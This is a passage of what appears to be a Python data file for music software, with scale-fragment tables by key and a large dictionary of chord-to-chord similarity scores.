'EMinor': [ [ ['A', 'B', 'C'], ['C', 'D', 'E'], ['E', 'Fs', 'G', 'A'] ], [ ['A', 'G', 'Fs', 'E'], ['C', 'B', 'A'], ['E', 'D', 'C'] ] ],
'DMinor': [ [ ['A', 'As', 'C'], ['C', 'D', 'E'], ['E', 'F', 'G', 'A'] ], [ ['A', 'G', 'F', 'E'], ['C', 'As', 'A'], ['E', 'D', 'C'] ] ],
'FMajor': [ [ ['A', 'As', 'C'], ['C', 'D', 'E'], ['E', 'F', 'G', 'A'] ], [ ['A', 'G', 'F', 'E'], ['C', 'As', 'A'], ['E', 'D', 'C'] ] ],
'AMinor': [ [ ['A', 'B', 'C'], ['C', 'D', 'E'], ['E', 'F', 'G', 'A'] ], [ ['A', 'G', 'F', 'E'], ['C', 'B', 'A'], ['E', 'D', 'C'] ] ],
},
'FsMajor': {
'CsMajor': [ [ ['Fs', 'Gs', 'As'], ['As', 'C', 'Cs'], ['Cs', 'Ds', 'F', 'Fs'] ], [ ['Fs', 'F', 'Ds', 'Cs'], ['As', 'Gs', 'Fs'], ['Cs', 'C', 'As'] ] ],
'GsMinor': [ [ ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs'], ['Cs', 'Ds', 'E', 'Fs'] ], [ ['Fs', 'E', 'Ds', 'Cs'], ['As', 'Gs', 'Fs'], ['Cs', 'B', 'As'] ] ],
'BMajor': [ [ ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs'], ['Cs', 'Ds', 'E', 'Fs'] ], [ ['Fs', 'E', 'Ds', 'Cs'], ['As', 'Gs', 'Fs'], ['Cs', 'B', 'As'] ] ],
'AsMinor': [ [ ['Fs', 'Gs', 'As'], ['As', 'C', 'Cs'], ['Cs', 'Ds', 'F', 'Fs'] ], [ ['Fs', 'F', 'Ds', 'Cs'], ['As', 'Gs', 'Fs'], ['Cs', 'C', 'As'] ] ],
'DsMinor': [ [ ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs'], ['Cs', 'Ds', 'F', 'Fs'] ], [ ['Fs', 'F', 'Ds', 'Cs'], ['As', 'Gs', 'Fs'], ['Cs', 'B', 'As'] ] ],
'FsMajor': [ [ ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs'], ['Cs', 'Ds', 'F', 'Fs'] ], [ ['Fs', 'F', 'Ds', 'Cs'], ['As', 'Gs', 'Fs'], ['Cs', 'B', 'As'] ] ],
},
}
ChordSimilarity = {
'AMinor': {
'AMinor': 3,
'CDim': 1,
'Gs7': 1,
'GMaj7': 0,
'GsDim': 0,
'GsMajor': 1,
'Fs7': 1,
'CMajor': 2,
'Em7': 1,
'Dsm7': 0,
'Gsm7': 0,
'DMaj7': 1,
'Dm7': 2,
'Cm7': 1,
'CsMinor': 1,
'FsMinor': 1,
'DsMaj7': 0,
'BMaj7': 0,
'GMajor': 0,
'EMinor': 1,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 1,
'FMajor': 2,
'ADim': 2,
'CMinor': 1,
'EDim': 1,
'B7': 1,
'AMajor': 2,
'A7': 2,
'Fm7': 1,
'DsMajor': 0,
'E7': 1,
'C7': 2,
'GsMinor': 0,
'Bm7': 1,
'G7': 0,
'Asm7': 0,
'BMajor': 0,
'Ds7': 0,
'GsMaj7': 1,
'AsMinor': 0,
'BDim': 0,
'AsMajor': 0,
'AMaj7': 2,
'DMajor': 1,
'AsDim': 1,
'Fsm7': 2,
'Cs7': 0,
'Gm7': 0,
'DDim': 0,
'CsMajor': 0,
'FMinor': 1,
'EMajor': 1,
'As7': 0,
'F7': 2,
'FMaj7': 3,
'FsDim': 2,
'GDim': 0,
'GMinor': 0,
'CsDim': 1,
'DsDim': 1,
'EMaj7': 1,
'FsMaj7': 0,
'BMinor': 0,
'CMaj7': 2,
'AsMaj7': 1,
'D7': 2,
'Csm7': 1,
'FsMajor': 0,
'Am7': 3,
'DsMinor': 0,
},
'CDim': {
'AMinor': 1,
'CDim': 3,
'Gs7': 3,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 2,
'Fs7': 1,
'CMajor': 1,
'Em7': 0,
'Dsm7': 2,
'Gsm7': 2,
'DMaj7': 1,
'Dm7': 1,
'Cm7': 2,
'CsMinor': 0,
'FsMinor': 1,
'DsMaj7': 1,
'BMaj7': 2,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 0,
'FMajor': 1,
'ADim': 2,
'CMinor': 2,
'EDim': 0,
'B7': 2,
'AMajor': 0,
'A7': 0,
'Fm7': 2,
'DsMajor': 1,
'E7': 0,
'C7': 1,
'GsMinor': 1,
'Bm7': 1,
'G7': 0,
'Asm7': 0,
'BMajor': 2,
'Ds7': 1,
'GsMaj7': 2,
'AsMinor': 0,
'BDim': 0,
'AsMajor': 0,
'AMaj7': 0,
'DMajor': 1,
'AsDim': 0,
'Fsm7': 1,
'Cs7': 0,
'Gm7': 0,
'DDim': 0,
'CsMajor': 0,
'FMinor': 1,
'EMajor': 0,
'As7': 0,
'F7': 2,
'FMaj7': 1,
'FsDim': 2,
'GDim': 0,
'GMinor': 0,
'CsDim': 0,
'DsDim': 2,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 1,
'CMaj7': 1,
'AsMaj7': 0,
'D7': 2,
'Csm7': 0,
'FsMajor': 1,
'Am7': 1,
'DsMinor': 2,
},
'Gs7': {
'AMinor': 1,
'CDim': 3,
'Gs7': 4,
'GMaj7': 1,
'GsDim': 1,
'GsMajor': 3,
'Fs7': 1,
'CMajor': 1,
'Em7': 0,
'Dsm7': 2,
'Gsm7': 3,
'DMaj7': 1,
'Dm7': 1,
'Cm7': 2,
'CsMinor': 1,
'FsMinor': 1,
'DsMaj7': 1,
'BMaj7': 2,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 2,
'FDim': 1,
'DMinor': 0,
'FMajor': 1,
'ADim': 2,
'CMinor': 2,
'EDim': 0,
'B7': 2,
'AMajor': 0,
'A7': 0,
'Fm7': 3,
'DsMajor': 1,
'E7': 1,
'C7': 1,
'GsMinor': 2,
'Bm7': 1,
'G7': 0,
'Asm7': 1,
'BMajor': 2,
'Ds7': 1,
'GsMaj7': 3,
'AsMinor': 0,
'BDim': 0,
'AsMajor': 0,
'AMaj7': 1,
'DMajor': 1,
'AsDim': 0,
'Fsm7': 1,
'Cs7': 1,
'Gm7': 0,
'DDim': 1,
'CsMajor': 1,
'FMinor': 2,
'EMajor': 1,
'As7': 1,
'F7': 2,
'FMaj7': 1,
'FsDim': 2,
'GDim': 0,
'GMinor': 0,
'CsDim': 0,
'DsDim': 2,
'EMaj7': 2,
'FsMaj7': 1,
'BMinor': 1,
'CMaj7': 1,
'AsMaj7': 0,
'D7': 2,
'Csm7': 1,
'FsMajor': 1,
'Am7': 1,
'DsMinor': 2,
},
'GMaj7': {
'AMinor': 0,
'CDim': 1,
'Gs7': 1,
'GMaj7': 4,
'GsDim': 2,
'GsMajor': 0,
'Fs7': 1,
'CMajor': 1,
'Em7': 3,
'Dsm7': 1,
'Gsm7': 2,
'DMaj7': 2,
'Dm7': 1,
'Cm7': 1,
'CsMinor': 0,
'FsMinor': 1,
'DsMaj7': 2,
'BMaj7': 2,
'GMajor': 3,
'EMinor': 2,
'CsMaj7': 0,
'FDim': 1,
'DMinor': 1,
'FMajor': 0,
'ADim': 0,
'CMinor': 1,
'EDim': 1,
'B7': 2,
'AMajor': 0,
'A7': 1,
'Fm7': 0,
'DsMajor': 1,
'E7': 2,
'C7': 1,
'GsMinor': 1,
'Bm7': 3,
'G7': 3,
'Asm7': 0,
'BMajor': 2,
'Ds7': 1,
'GsMaj7': 1,
'AsMinor': 0,
'BDim': 2,
'AsMajor': 1,
'AMaj7': 0,
'DMajor': 2,
'AsDim': 0,
'Fsm7': 1,
'Cs7': 1,
'Gm7': 2,
'DDim': 1,
'CsMajor': 0,
'FMinor': 0,
'EMajor': 1,
'As7': 1,
'F7': 0,
'FMaj7': 0,
'FsDim': 1,
'GDim': 1,
'GMinor': 2,
'CsDim': 1,
'DsDim': 1,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 3,
'CMaj7': 2,
'AsMaj7': 1,
'D7': 2,
'Csm7': 1,
'FsMajor': 1,
'Am7': 1,
'DsMinor': 1,
},
'GsDim': {
'AMinor': 0,
'CDim': 0,
'Gs7': 1,
'GMaj7': 2,
'GsDim': 3,
'GsMajor': 1,
'Fs7': 0,
'CMajor': 0,
'Em7': 2,
'Dsm7': 0,
'Gsm7': 2,
'DMaj7': 1,
'Dm7': 1,
'Cm7': 0,
'CsMinor': 1,
'FsMinor': 0,
'DsMaj7': 1,
'BMaj7': 1,
'GMajor': 2,
'EMinor': 1,
'CsMaj7': 1,
'FDim': 2,
'DMinor': 1,
'FMajor': 0,
'ADim': 0,
'CMinor': 0,
'EDim': 0,
'B7': 1,
'AMajor': 0,
'A7': 0,
'Fm7': 1,
'DsMajor': 0,
'E7': 3,
'C7': 0,
'GsMinor': 2,
'Bm7': 2,
'G7': 2,
'Asm7': 1,
'BMajor': 1,
'Ds7': 0,
'GsMaj7': 1,
'AsMinor': 0,
'BDim': 2,
'AsMajor': 1,
'AMaj7': 1,
'DMajor': 1,
'AsDim': 0,
'Fsm7': 0,
'Cs7': 2,
'Gm7': 1,
'DDim': 2,
'CsMajor': 1,
'FMinor': 1,
'EMajor': 2,
'As7': 2,
'F7': 0,
'FMaj7': 0,
'FsDim': 0,
'GDim': 0,
'GMinor': 1,
'CsDim': 0,
'DsDim': 0,
'EMaj7': 2,
'FsMaj7': 0,
'BMinor': 2,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 1,
'Csm7': 2,
'FsMajor': 0,
'Am7': 0,
'DsMinor': 0,
},
'GsMajor': {
'AMinor': 1,
'CDim': 2,
'Gs7': 3,
'GMaj7': 0,
'GsDim': 1,
'GsMajor': 3,
'Fs7': 0,
'CMajor': 1,
'Em7': 0,
'Dsm7': 1,
'Gsm7': 2,
'DMaj7': 0,
'Dm7': 1,
'Cm7': 2,
'CsMinor': 1,
'FsMinor': 0,
'DsMaj7': 1,
'BMaj7': 1,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 2,
'FDim': 1,
'DMinor': 0,
'FMajor': 1,
'ADim': 2,
'CMinor': 2,
'EDim': 0,
'B7': 1,
'AMajor': 0,
'A7': 0,
'Fm7': 3,
'DsMajor': 1,
'E7': 1,
'C7': 1,
'GsMinor': 2,
'Bm7': 0,
'G7': 0,
'Asm7': 1,
'BMajor': 1,
'Ds7': 1,
'GsMaj7': 3,
'AsMinor': 0,
'BDim': 0,
'AsMajor': 0,
'AMaj7': 1,
'DMajor': 0,
'AsDim': 0,
'Fsm7': 0,
'Cs7': 1,
'Gm7': 0,
'DDim': 1,
'CsMajor': 1,
'FMinor': 2,
'EMajor': 1,
'As7': 1,
'F7': 2,
'FMaj7': 1,
'FsDim': 1,
'GDim': 0,
'GMinor': 0,
'CsDim': 0,
'DsDim': 1,
'EMaj7': 2,
'FsMaj7': 0,
'BMinor': 0,
'CMaj7': 1,
'AsMaj7': 0,
'D7': 1,
'Csm7': 1,
'FsMajor': 0,
'Am7': 1,
'DsMinor': 1,
},
'Fs7': {
'AMinor': 1,
'CDim': 1,
'Gs7': 1,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 0,
'Fs7': 4,
'CMajor': 1,
'Em7': 1,
'Dsm7': 3,
'Gsm7': 1,
'DMaj7': 2,
'Dm7': 0,
'Cm7': 1,
'CsMinor': 2,
'FsMinor': 2,
'DsMaj7': 1,
'BMaj7': 2,
'GMajor': 0,
'EMinor': 1,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 0,
'FMajor': 0,
'ADim': 0,
'CMinor': 0,
'EDim': 2,
'B7': 1,
'AMajor': 2,
'A7': 2,
'Fm7': 0,
'DsMajor': 1,
'E7': 1,
'C7': 2,
'GsMinor': 0,
'Bm7': 1,
'G7': 0,
'Asm7': 2,
'BMajor': 1,
'Ds7': 2,
'GsMaj7': 0,
'AsMinor': 2,
'BDim': 0,
'AsMajor': 1,
'AMaj7': 2,
'DMajor': 1,
'AsDim': 3,
'Fsm7': 3,
'Cs7': 1,
'Gm7': 1,
'DDim': 0,
'CsMajor': 1,
'FMinor': 0,
'EMajor': 1,
'As7': 1,
'F7': 0,
'FMaj7': 1,
'FsDim': 1,
'GDim': 2,
'GMinor': 1,
'CsDim': 2,
'DsDim': 1,
'EMaj7': 1,
'FsMaj7': 3,
'BMinor': 1,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 1,
'Csm7': 2,
'FsMajor': 3,
'Am7': 1,
'DsMinor': 2,
},
'CMajor': {
'AMinor': 2,
'CDim': 1,
'Gs7': 1,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 1,
'Fs7': 1,
'CMajor': 3,
'Em7': 2,
'Dsm7': 0,
'Gsm7': 0,
'DMaj7': 0,
'Dm7': 1,
'Cm7': 2,
'CsMinor': 1,
'FsMinor': 0,
'DsMaj7': 1,
'BMaj7': 0,
'GMajor': 1,
'EMinor': 2,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 0,
'FMajor': 1,
'ADim': 1,
'CMinor': 2,
'EDim': 2,
'B7': 0,
'AMajor': 1,
'A7': 2,
'Fm7': 1,
'DsMajor': 1,
'E7': 1,
'C7': 3,
'GsMinor': 0,
'Bm7': 0,
'G7': 1,
'Asm7': 0,
'BMajor': 0,
'Ds7': 1,
'GsMaj7': 2,
'AsMinor': 0,
'BDim': 0,
'AsMajor': 0,
'AMaj7': 1,
'DMajor': 0,
'AsDim': 1,
'Fsm7': 1,
'Cs7': 0,
'Gm7': 1,
'DDim': 0,
'CsMajor': 0,
'FMinor': 1,
'EMajor': 1,
'As7': 0,
'F7': 1,
'FMaj7': 2,
'FsDim': 1,
'GDim': 1,
'GMinor': 1,
'CsDim': 2,
'DsDim': 0,
'EMaj7': 1,
'FsMaj7': 0,
'BMinor': 0,
'CMaj7': 3,
'AsMaj7': 0,
'D7': 1,
'Csm7': 1,
'FsMajor': 0,
'Am7': 3,
'DsMinor': 0,
},
'Em7': {
'AMinor': 1,
'CDim': 0,
'Gs7': 0,
'GMaj7': 3,
'GsDim': 2,
'GsMajor': 0,
'Fs7': 1,
'CMajor': 2,
'Em7': 4,
'Dsm7': 0,
'Gsm7': 1,
'DMaj7': 1,
'Dm7': 1,
'Cm7': 1,
'CsMinor': 1,
'FsMinor': 0,
'DsMaj7': 2,
'BMaj7': 1,
'GMajor': 3,
'EMinor': 3,
'CsMaj7': 0,
'FDim': 1,
'DMinor': 1,
'FMajor': 0,
'ADim': 0,
'CMinor': 1,
'EDim': 2,
'B7': 1,
'AMajor': 1,
'A7': 2,
'Fm7': 0,
'DsMajor': 1,
'E7': 3,
'C7': 2,
'GsMinor': 1,
'Bm7': 2,
'G7': 3,
'Asm7': 0,
'BMajor': 1,
'Ds7': 1,
'GsMaj7': 1,
'AsMinor': 0,
'BDim': 2,
'AsMajor': 1,
'AMaj7': 1,
'DMajor': 1,
'AsDim': 1,
'Fsm7': 1,
'Cs7': 1,
'Gm7': 2,
'DDim': 1,
'CsMajor': 0,
'FMinor': 0,
'EMajor': 2,
'As7': 1,
'F7': 0,
'FMaj7': 1,
'FsDim': 0,
'GDim': 1,
'GMinor': 2,
'CsDim': 2,
'DsDim': 0,
'EMaj7': 2,
'FsMaj7': 0,
'BMinor': 2,
'CMaj7': 3,
'AsMaj7': 1,
'D7': 1,
'Csm7': 2,
'FsMajor': 0,
'Am7': 2,
'DsMinor': 0,
},
'Dsm7': {
'AMinor': 0,
'CDim': 2,
'Gs7': 2,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 1,
'Fs7': 3,
'CMajor': 0,
'Em7': 0,
'Dsm7': 4,
'Gsm7': 2,
'DMaj7': 2,
'Dm7': 0,
'Cm7': 2,
'CsMinor': 1,
'FsMinor': 2,
'DsMaj7': 2,
'BMaj7': 3,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 0,
'FMajor': 0,
'ADim': 1,
'CMinor': 1,
'EDim': 1,
'B7': 2,
'AMajor': 1,
'A7': 1,
'Fm7': 1,
'DsMajor': 2,
'E7': 0,
'C7': 1,
'GsMinor': 1,
'Bm7': 1,
'G7': 0,
'Asm7': 2,
'BMajor': 2,
'Ds7': 3,
'GsMaj7': 1,
'AsMinor': 2,
'BDim': 0,
'AsMajor': 1,
'AMaj7': 1,
'DMajor': 1,
'AsDim': 2,
'Fsm7': 2,
'Cs7': 1,
'Gm7': 1,
'DDim': 0,
'CsMajor': 1,
'FMinor': 0,
'EMajor': 0,
'As7': 1,
'F7': 1,
'FMaj7': 0,
'FsDim': 1,
'GDim': 2,
'GMinor': 1,
'CsDim': 1,
'DsDim': 2,
'EMaj7': 1,
'FsMaj7': 3,
'BMinor': 1,
'CMaj7': 0,
'AsMaj7': 1,
'D7': 1,
'Csm7': 1,
'FsMajor': 3,
'Am7': 0,
'DsMinor': 3,
},
'Gsm7': {
'AMinor': 0,
'CDim': 2,
'Gs7': 3,
'GMaj7': 2,
'GsDim': 2,
'GsMajor': 2,
'Fs7': 1,
'CMajor': 0,
'Em7': 1,
'Dsm7': 2,
'Gsm7': 4,
'DMaj7': 1,
'Dm7': 0,
'Cm7': 1,
'CsMinor': 1,
'FsMinor': 1,
'DsMaj7': 1,
'BMaj7': 3,
'GMajor': 1,
'EMinor': 1,
'CsMaj7': 1,
'FDim': 2,
'DMinor': 0,
'FMajor': 0,
'ADim': 1,
'CMinor': 1,
'EDim': 0,
'B7': 3,
'AMajor': 0,
'A7': 0,
'Fm7': 2,
'DsMajor': 1,
'E7': 2,
'C7': 0,
'GsMinor': 3,
'Bm7': 2,
'G7': 1,
'Asm7': 1,
'BMajor': 3,
'Ds7': 1,
'GsMaj7': 2,
'AsMinor': 0,
'BDim': 1,
'AsMajor': 0,
'AMaj7': 1,
'DMajor': 1,
'AsDim': 0,
'Fsm7': 1,
'Cs7': 2,
'Gm7': 0,
'DDim': 1,
'CsMajor': 1,
'FMinor': 1,
'EMajor': 2,
'As7': 1,
'F7': 1,
'FMaj7': 0,
'FsDim': 1,
'GDim': 0,
'GMinor': 0,
'CsDim': 0,
'DsDim': 2,
'EMaj7': 3,
'FsMaj7': 1,
'BMinor': 2,
'CMaj7': 1,
'AsMaj7': 0,
'D7': 1,
'Csm7': 2,
'FsMajor': 1,
'Am7': 0,
'DsMinor': 2,
},
'DMaj7': {
'AMinor': 1,
'CDim': 1,
'Gs7': 1,
'GMaj7': 2,
'GsDim': 1,
'GsMajor': 0,
'Fs7': 2,
'CMajor': 0,
'Em7': 1,
'Dsm7': 2,
'Gsm7': 1,
'DMaj7': 4,
'Dm7': 2,
'Cm7': 0,
'CsMinor': 1,
'FsMinor': 3,
'DsMaj7': 1,
'BMaj7': 1,
'GMajor': 1,
'EMinor': 0,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 2,
'FMajor': 1,
'ADim': 1,
'CMinor': 0,
'EDim': 0,
'B7': 2,
'AMajor': 2,
'A7': 2,
'Fm7': 0,
'DsMajor': 0,
'E7': 1,
'C7': 0,
'GsMinor': 0,
'Bm7': 3,
'G7': 1,
'Asm7': 1,
'BMajor': 1,
'Ds7': 1,
'GsMaj7': 0,
'AsMinor': 1,
'BDim': 1,
'AsMajor': 1,
'AMaj7': 2,
'DMajor': 3,
'AsDim': 1,
'Fsm7': 3,
'Cs7': 1,
'Gm7': 1,
'DDim': 1,
'CsMajor': 1,
'FMinor': 0,
'EMajor': 0,
'As7': 1,
'F7': 1,
'FMaj7': 1,
'FsDim': 2,
'GDim': 1,
'GMinor': 1,
'CsDim': 1,
'DsDim': 2,
'EMaj7': 0,
'FsMaj7': 2,
'BMinor': 2,
'CMaj7': 0,
'AsMaj7': 2,
'D7': 3,
'Csm7': 1,
'FsMajor': 2,
'Am7': 1,
'DsMinor': 1,
},
'Dm7': {
'AMinor': 2,
'CDim': 1,
'Gs7': 1,
'GMaj7': 1,
'GsDim': 1,
'GsMajor': 1,
'Fs7': 0,
'CMajor': 1,
'Em7': 1,
'Dsm7': 0,
'Gsm7': 0,
'DMaj7': 2,
'Dm7': 4,
'Cm7': 1,
'CsMinor': 0,
'FsMinor': 1,
'DsMaj7': 1,
'BMaj7': 0,
'GMajor': 1,
'EMinor': 0,
'CsMaj7': 2,
'FDim': 1,
'DMinor': 3,
'FMajor': 3,
'ADim': 2,
'CMinor': 1,
'EDim': 0,
'B7': 1,
'AMajor': 1,
'A7': 1,
'Fm7': 2,
'DsMajor': 0,
'E7': 1,
'C7': 1,
'GsMinor': 0,
'Bm7': 2,
'G7': 2,
'Asm7': 1,
'BMajor': 0,
'Ds7': 0,
'GsMaj7': 1,
'AsMinor': 1,
'BDim': 2,
'AsMajor': 2,
'AMaj7': 1,
'DMajor': 2,
'AsDim': 0,
'Fsm7': 1,
'Cs7': 1,
'Gm7': 2,
'DDim': 2,
'CsMajor': 1,
'FMinor': 2,
'EMajor': 0,
'As7': 2,
'F7': 3,
'FMaj7': 3,
'FsDim': 2,
'GDim': 0,
'GMinor': 1,
'CsDim': 0,
'DsDim': 1,
'EMaj7': 0,
'FsMaj7': 1,
'BMinor': 1,
'CMaj7': 1,
'AsMaj7': 3,
'D7': 3,
'Csm7': 0,
'FsMajor': 0,
'Am7': 2,
'DsMinor': 0,
},
'Cm7': {
'AMinor': 1,
'CDim': 2,
'Gs7': 2,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 2,
'Fs7': 1,
'CMajor': 2,
'Em7': 1,
'Dsm7': 2,
'Gsm7': 1,
'DMaj7': 0,
'Dm7': 1,
'Cm7': 4,
'CsMinor': 0,
'FsMinor': 0,
'DsMaj7': 3,
'BMaj7': 2,
'GMajor': 1,
'EMinor': 1,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 0,
'FMajor': 1,
'ADim': 2,
'CMinor': 3,
'EDim': 2,
'B7': 1,
'AMajor': 0,
'A7': 1,
'Fm7': 2,
'DsMajor': 3,
'E7': 0,
'C7': 3,
'GsMinor': 1,
'Bm7': 0,
'G7': 1,
'Asm7': 1,
'BMajor': 1,
'Ds7': 3,
'GsMaj7': 3,
'AsMinor': 1,
'BDim': 0,
'AsMajor': 1,
'AMaj7': 0,
'DMajor': 0,
'AsDim': 1,
'Fsm7': 0,
'Cs7': 0,
'Gm7': 2,
'DDim': 0,
'CsMajor': 0,
'FMinor': 1,
'EMajor': 0,
'As7': 1,
'F7': 2,
'FMaj7': 1,
'FsDim': 1,
'GDim': 2,
'GMinor': 2,
'CsDim': 1,
'DsDim': 1,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 0,
'CMaj7': 2,
'AsMaj7': 1,
'D7': 1,
'Csm7': 0,
'FsMajor': 1,
'Am7': 2,
'DsMinor': 2,
},
'CsMinor': {
'AMinor': 1,
'CDim': 0,
'Gs7': 1,
'GMaj7': 0,
'GsDim': 1,
'GsMajor': 1,
'Fs7': 2,
'CMajor': 1,
'Em7': 1,
'Dsm7': 1,
'Gsm7': 1,
'DMaj7': 1,
'Dm7': 0,
'Cm7': 0,
'CsMinor': 3,
'FsMinor': 1,
'DsMaj7': 0,
'BMaj7': 0,
'GMajor': 0,
'EMinor': 1,
'CsMaj7': 2,
'FDim': 1,
'DMinor': 0,
'FMajor': 0,
'ADim': 0,
'CMinor': 0,
'EDim': 1,
'B7': 0,
'AMajor': 2,
'A7': 2,
'Fm7': 1,
'DsMajor': 0,
'E7': 2,
'C7': 1,
'GsMinor': 1,
'Bm7': 0,
'G7': 0,
'Asm7': 2,
'BMajor': 0,
'Ds7': 1,
'GsMaj7': 1,
'AsMinor': 1,
'BDim': 0,
'AsMajor': 0,
'AMaj7': 3,
'DMajor': 0,
'AsDim': 2,
'Fsm7': 2,
'Cs7': 2,
'Gm7': 0,
'DDim': 1,
'CsMajor': 2,
'FMinor': 1,
'EMajor': 2,
'As7': 1,
'F7': 0,
'FMaj7': 1,
'FsDim': 0,
'GDim': 1,
'GMinor': 0,
'CsDim': 2,
'DsDim': 0,
'EMaj7': 2,
'FsMaj7': 1,
'BMinor': 0,
'CMaj7': 1,
'AsMaj7': 0,
'D7': 0,
'Csm7': 3,
'FsMajor': 1,
'Am7': 1,
'DsMinor': 0,
},
'FsMinor': {
'AMinor': 1,
'CDim': 1,
'Gs7': 1,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 0,
'Fs7': 2,
'CMajor': 0,
'Em7': 0,
'Dsm7': 2,
'Gsm7': 1,
'DMaj7': 3,
'Dm7': 1,
'Cm7': 0,
'CsMinor': 1,
'FsMinor': 3,
'DsMaj7': 0,
'BMaj7': 1,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 1,
'FMajor': 1,
'ADim': 1,
'CMinor': 0,
'EDim': 0,
'B7': 2,
'AMajor': 2,
'A7': 2,
'Fm7': 0,
'DsMajor': 0,
'E7': 0,
'C7': 0,
'GsMinor': 0,
'Bm7': 2,
'G7': 0,
'Asm7': 1,
'BMajor': 1,
'Ds7': 1,
'GsMaj7': 0,
'AsMinor': 1,
'BDim': 0,
'AsMajor': 0,
'AMaj7': 2,
'DMajor': 2,
'AsDim': 1,
'Fsm7': 3,
'Cs7': 1,
'Gm7': 0,
'DDim': 0,
'CsMajor': 1,
'FMinor': 0,
'EMajor': 0,
'As7': 0,
'F7': 1,
'FMaj7': 1,
'FsDim': 2,
'GDim': 1,
'GMinor': 0,
'CsDim': 1,
'DsDim': 2,
'EMaj7': 0,
'FsMaj7': 2,
'BMinor': 1,
'CMaj7': 0,
'AsMaj7': 1,
'D7': 2,
'Csm7': 1,
'FsMajor': 2,
'Am7': 1,
'DsMinor': 1,
},
'DsMaj7': {
'AMinor': 0,
'CDim': 1,
'Gs7': 1,
'GMaj7': 2,
'GsDim': 1,
'GsMajor': 1,
'Fs7': 1,
'CMajor': 1,
'Em7': 2,
'Dsm7': 2,
'Gsm7': 1,
'DMaj7': 1,
'Dm7': 1,
'Cm7': 3,
'CsMinor': 0,
'FsMinor': 0,
'DsMaj7': 4,
'BMaj7': 2,
'GMajor': 2,
'EMinor': 1,
'CsMaj7': 0,
'FDim': 0,
'DMinor': 1,
'FMajor': 0,
'ADim': 1,
'CMinor': 2,
'EDim': 2,
'B7': 1,
'AMajor': 0,
'A7': 1,
'Fm7': 1,
'DsMajor': 3,
'E7': 1,
'C7': 2,
'GsMinor': 1,
'Bm7': 1,
'G7': 2,
'Asm7': 1,
'BMajor': 1,
'Ds7': 3,
'GsMaj7': 2,
'AsMinor': 1,
'BDim': 1,
'AsMajor': 2,
'AMaj7': 0,
'DMajor': 1,
'AsDim': 1,
'Fsm7': 0,
'Cs7': 0,
'Gm7': 3,
'DDim': 1,
'CsMajor': 0,
'FMinor': 0,
'EMajor': 0,
'As7': 2,
'F7': 1,
'FMaj7': 0,
'FsDim': 0,
'GDim': 2,
'GMinor': 3,
'CsDim': 1,
'DsDim': 1,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 1,
'CMaj7': 1,
'AsMaj7': 2,
'D7': 1,
'Csm7': 0,
'FsMajor': 1,
'Am7': 1,
'DsMinor': 2,
},
'BMaj7': {
'AMinor': 0,
'CDim': 2,
'Gs7': 2,
'GMaj7': 2,
'GsDim': 1,
'GsMajor': 1,
'Fs7': 2,
'CMajor': 0,
'Em7': 1,
'Dsm7': 3,
'Gsm7': 3,
'DMaj7': 1,
'Dm7': 0,
'Cm7': 2,
'CsMinor': 0,
'FsMinor': 1,
'DsMaj7': 2,
'BMaj7': 4,
'GMajor': 1,
'EMinor': 1,
'CsMaj7': 0,
'FDim': 1,
'DMinor': 0,
'FMajor': 0,
'ADim': 1,
'CMinor': 1,
'EDim': 1,
'B7': 3,
'AMajor': 0,
'A7': 0,
'Fm7': 1,
'DsMajor': 2,
'E7': 1,
'C7': 1,
'GsMinor': 2,
'Bm7': 2,
'G7': 1,
'Asm7': 1,
'BMajor': 3,
'Ds7': 2,
'GsMaj7': 1,
'AsMinor': 1,
'BDim': 1,
'AsMajor': 1,
'AMaj7': 0,
'DMajor': 1,
'AsDim': 1,
'Fsm7': 1,
'Cs7': 1,
'Gm7': 1,
'DDim': 0,
'CsMajor': 0,
'FMinor': 0,
'EMajor': 1,
'As7': 1,
'F7': 1,
'FMaj7': 0,
'FsDim': 1,
'GDim': 1,
'GMinor': 1,
'CsDim': 0,
'DsDim': 2,
'EMaj7': 2,
'FsMaj7': 2,
'BMinor': 2,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 1,
'Csm7': 1,
'FsMajor': 2,
'Am7': 0,
'DsMinor': 3,
},
'GMajor': {
'AMinor': 0,
'CDim': 0,
'Gs7': 0,
'GMaj7': 3,
'GsDim': 2,
'GsMajor': 0,
'Fs7': 0,
'CMajor': 1,
'Em7': 3,
'Dsm7': 0,
'Gsm7': 1,
'DMaj7': 1,
'Dm7': 1,
'Cm7': 1,
'CsMinor': 0,
'FsMinor': 0,
'DsMaj7': 2,
'BMaj7': 1,
'GMajor': 3,
'EMinor': 2,
'CsMaj7': 0,
'FDim': 1,
'DMinor': 1,
'FMajor': 0,
'ADim': 0,
'CMinor': 1,
'EDim': 1,
'B7': 1,
'AMajor': 0,
'A7': 1,
'Fm7': 0,
'DsMajor': 1,
'E7': 2,
'C7': 1,
'GsMinor': 1,
'Bm7': 2,
'G7': 3,
'Asm7': 0,
'BMajor': 1,
'Ds7': 1,
'GsMaj7': 1,
'AsMinor': 0,
'BDim': 2,
'AsMajor': 1,
'AMaj7': 0,
'DMajor': 1,
'AsDim': 0,
'Fsm7': 0,
'Cs7': 1,
'Gm7': 2,
'DDim': 1,
'CsMajor': 0,
